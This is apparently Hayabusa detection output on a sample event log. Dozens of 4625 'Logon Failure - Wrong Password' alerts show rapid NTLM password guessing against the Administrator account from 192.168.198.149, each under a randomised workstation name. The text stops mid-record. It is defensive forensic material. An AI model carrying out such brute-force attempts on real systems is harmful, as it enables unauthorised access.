NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PeEfbWpoipfYtOKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RKJW1vSrIAbRTzyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aU4G8NBru22Vc4Cl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sacBcqxV97FUihrd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 41Ms0lEMeT0jYxYj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkQWVEHGM1NxowR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4qKqRY7L2IQRoU57 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eMIkvwbvqc9V6CFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PehzjCnK42ZPUE7e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fqw2GWiYfO0kU83 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFPJJNCFdPJl4igl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zc6CrAr7YoozKB6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xHXminAIeV4ZJIK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06YmUCHNZqbaZMdZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fYoENCtP2uPy9xNh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TRJRuXJTTH1afAfH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpnkzTlc3Uvj3hpY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIuD8haFzR8P87rL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XL1IreMAiE564NXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMUiCaMGBC46MnPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MOSWbwooyb60LExG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oSDNF7s3vbtkZIOz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JBMk0qOV6237XtK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j41R1U1tYPvApCkZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcPkVZSeg5VwChW8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDLxt5gaFDTKsiVl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94JvBKdxJkawQQMT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KgBMk00K3iC1GQem : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XdGOj9Ybm6bcCo3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: by6F4YKorxhp5ahn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1G6ZOgOaV6luDQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qqSwNfvpPLQd6ZH1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mxtJJj54xSzHibHI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Y3yznfdaZ7dtwDO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esllFn4asbLxwkBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Pr0cgd6cF5ukhZ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pS2fabTrbl6rZ1NB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkylDDmUyuT57HdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Aqs8rSvuLAQuhfDp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KI07KTgBJc4kBSKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Re3n3nJ8EEhRRT3G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BzspAC3z1csEn0Ve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tpkb6bf42SLUst3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1F5d2wn60OgAExW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bhPNRHWhTyonDPuA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zEsnyWpUuHVBo6et : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I2FwaWy9TALkk9eU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fuikeQsxlOUVifVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZWdsRJp9fHypPI1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B0j0IBX2eZnx99n9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YIZ5Knxg0xr0WmDb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wuej3f7mEoWmd4SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B0LcCi06ilIhFPwb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWsCGgoFmH06rRf4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP47JjNKqtYIZPsC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mNlWZ9o0xf7bl2d0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnPnB2lEN3BSDpXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVMyeF9jGuzHkTHg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sDKLl3PjW2qrzJGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkllnePSq3NQ5wgC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9qLWgQnR7P9cs7s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1AdU07nzvv7RB2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cHgiB5SMiQtsl5oD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 03e7QOn36l0jH35H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DoJBywV8x8cURwrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SDYGYO6s6g6Dbx8r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nUqXpeTNePFyBmCo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2h0qJWcbzRe1GSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edsfNOovOl1Ow503 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cxCC83XLMIJrNMvl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzussOcg5ihdrnD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 55l4HKICu8x0FpQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5GmlVWDjZ75tT08G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6v1DkuFvB04PESQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTLdNb0XbzXuLi51 : IP Address: 192.168.198.149 : AuthPackage: 